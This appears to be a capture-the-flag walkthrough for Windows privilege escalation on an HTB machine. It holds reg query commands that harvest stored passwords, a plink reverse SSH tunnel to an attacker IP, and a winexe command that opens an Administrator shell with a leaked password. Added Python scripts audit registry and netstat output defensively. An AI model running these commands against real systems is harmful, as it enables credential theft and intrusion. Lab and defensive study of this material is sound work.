Stored Passwords and Port Forwarding

Overview

Credentials can be stored in the registry, and some ports on the machine are only reachable from the machine itself (bound to localhost or otherwise not exposed to the network).

What if the user we landed on is an Administrator but still needs to supply credentials to execute commands as SYSTEM?

Registry Passwords

reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"

Example output: screenshot from the HTB machine Chatterbox (image not reproduced here).
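The reg query commands above produce one unindented key path followed by indented "name  type  data" rows. The audit helper below is an added example (not from the original notes): it parses that output format, reports where credential-looking REG_SZ values live without echoing the secret itself, and separately flags the Winlogon autologon case (AutoAdminLogon set to 1 together with a DefaultPassword), which is the configuration a defender should remove or replace with a managed credential. The sample output, key paths and values are constructed for the example.

```python
"""Audit `reg query` output for clear-text credential values (added example)."""
import re
from typing import Dict, List, Tuple

# Constructed sample of `reg query <key> /s` output; not captured from a real machine.
SAMPLE_REG_OUTPUT = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
    AutoAdminLogon    REG_SZ    1
    DefaultUserName    REG_SZ    Alfred
    DefaultPassword    REG_SZ    Welcome1
    Shell    REG_SZ    explorer.exe

HKEY_CURRENT_USER\Software\ExampleApp\Settings
    ServerPassword    REG_SZ    s3cret
    Theme    REG_SZ    dark
"""

# Value names that should never carry a clear-text secret.
SENSITIVE_NAMES = re.compile(r"(password|passwd|pwd|secret|token|apikey)", re.IGNORECASE)


def parse_reg_query(text: str) -> Dict[str, List[Tuple[str, str, str]]]:
    """Group reg query output into {key_path: [(name, type, data), ...]}.

    Key paths are unindented; value rows are indented and separated by runs
    of whitespace (reg.exe uses four spaces)."""
    keys: Dict[str, List[Tuple[str, str, str]]] = {}
    current = None
    for raw in text.splitlines():
        line = raw.rstrip()
        if not line:
            continue
        if not raw.startswith((" ", "\t")):
            current = line
            keys[current] = []
            continue
        parts = re.split(r"\s{2,}|\t", line.strip(), maxsplit=2)
        if len(parts) == 3 and current is not None:
            name, vtype, data = parts
            keys[current].append((name, vtype, data))
    return keys


def find_cleartext_credentials(text: str) -> List[Tuple[str, str]]:
    """Return (key_path, value_name) for REG_SZ values whose name suggests a
    secret and whose data is non-empty. The data itself is deliberately not
    returned, so an audit report does not spread the secret further."""
    findings = []
    for key, values in parse_reg_query(text).items():
        for name, vtype, data in values:
            if vtype == "REG_SZ" and data and SENSITIVE_NAMES.search(name):
                findings.append((key, name))
    return findings


def autologon_enabled(text: str) -> bool:
    """True if a Winlogon key has AutoAdminLogon=1 and a DefaultPassword set."""
    for key, values in parse_reg_query(text).items():
        if not key.lower().endswith("\\winlogon"):
            continue
        names = {n.lower(): d for n, _, d in values}
        if names.get("autoadminlogon") == "1" and names.get("defaultpassword"):
            return True
    return False


if __name__ == "__main__":
    for key, name in find_cleartext_credentials(SAMPLE_REG_OUTPUT):
        print(f"clear-text credential value: {key} -> {name}")
    if autologon_enabled(SAMPLE_REG_OUTPUT):
        print("Winlogon autologon is enabled with a stored DefaultPassword")
```

To audit a real host, pipe the output of the reg query commands into this script instead of the constructed sample; the parser only assumes the column layout reg.exe prints, not any particular key.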

Port Forwarding

netstat -ano
Example output: screenshot from the HTB machine Chatterbox (image not reproduced here).

Plink is the command-line SSH and Telnet client from the PuTTY suite; it lets us set up a port forward from the machine.

Upload and run plink.exe so the target SSHes back to your attacker machine with a remote port forward (-R): port 445 on your machine is forwarded to 127.0.0.1:445 on the target, so you can reach the target's local port 445 through the tunnel.

plink.exe -l root -pw rootpasswd -R 445:127.0.0.1:445 10.10.14.10

You'll end up with a shell on your own attacker machine opened from inside the target (box inception); leave it open, because the tunnel lives as long as that session does.
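The netstat -ano step is there to find which listeners are reachable only from the host, and the plink tunnel is what the forward looks like from the host's side. The script below is an added example (not from the original notes): it parses netstat -ano output and reports TCP listeners bound only to loopback, plus established connections whose remote port is 22, which is exactly the outbound SSH session a plink -R tunnel creates and which a defender reviewing a Windows host with no legitimate SSH use should map back to its PID. The sample output, PIDs and addresses (documentation ranges) are constructed.

```python
"""Audit `netstat -ano` output for loopback-only listeners and tunnel-shaped
outbound SSH connections (added example)."""
from typing import Dict, List, Tuple

# Constructed `netstat -ano` output; 192.0.2.10 is a documentation address, not a real host.
SAMPLE_NETSTAT = """
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       700
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    127.0.0.1:9255         0.0.0.0:0              LISTENING       2084
  TCP    192.0.2.10:49676       10.10.14.10:22         ESTABLISHED     3120
  TCP    [::1]:4040             [::]:0                 LISTENING       1912
  UDP    0.0.0.0:5355           *:*                                    1156
"""

LOOPBACK = {"127.0.0.1", "::1"}


def _split_endpoint(endpoint: str) -> Tuple[str, str]:
    """'127.0.0.1:445' -> ('127.0.0.1', '445'); '[::1]:4040' -> ('::1', '4040')."""
    host, _, port = endpoint.rpartition(":")
    return host.strip("[]"), port


def parse_netstat(text: str) -> List[Dict[str, str]]:
    """Turn netstat -ano lines into dicts; header lines are skipped."""
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if not parts or parts[0] not in ("TCP", "UDP"):
            continue
        if parts[0] == "UDP" and len(parts) == 4:  # UDP rows have no State column
            parts.insert(3, "")
        if len(parts) != 5:
            continue
        proto, local, remote, state, pid = parts
        local_ip, local_port = _split_endpoint(local)
        remote_ip, remote_port = _split_endpoint(remote)
        rows.append({"proto": proto, "local_ip": local_ip, "local_port": local_port,
                     "remote_ip": remote_ip, "remote_port": remote_port,
                     "state": state, "pid": pid})
    return rows


def loopback_only_listeners(text: str) -> List[Tuple[int, int]]:
    """(port, pid) for TCP listeners bound to 127.0.0.1 or ::1 only.

    These services are unreachable from the network directly but become
    reachable through any tunnel that terminates on the host."""
    return [(int(r["local_port"]), int(r["pid"])) for r in parse_netstat(text)
            if r["proto"] == "TCP" and r["state"] == "LISTENING"
            and r["local_ip"] in LOOPBACK]


def outbound_ssh_connections(text: str) -> List[Tuple[str, int]]:
    """(remote_ip, pid) for established TCP connections to remote port 22,
    the shape a plink -R reverse tunnel has from the host's point of view."""
    return [(r["remote_ip"], int(r["pid"])) for r in parse_netstat(text)
            if r["proto"] == "TCP" and r["state"] == "ESTABLISHED"
            and r["remote_port"] == "22"]


if __name__ == "__main__":
    for port, pid in loopback_only_listeners(SAMPLE_NETSTAT):
        print(f"loopback-only listener: tcp/{port} (PID {pid})")
    for remote_ip, pid in outbound_ssh_connections(SAMPLE_NETSTAT):
        print(f"outbound SSH session to {remote_ip} from PID {pid}: check what the process is")
```

On a real host, feed the script the saved output of netstat -ano and resolve each reported PID with tasklist; a PID that belongs to plink.exe or another SSH client on a server that has no business speaking SSH outbound is the finding.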

Use winexe to start a shell as Administrator over the forwarded port (127.0.0.1:445 on your machine now reaches the target's SMB service through the tunnel):

winexe -U Administrator%Welcome1 //127.0.0.1 cmd.exe

If a credential is leaked in a CTF environment, chances are it leads to something else, so don't disregard it.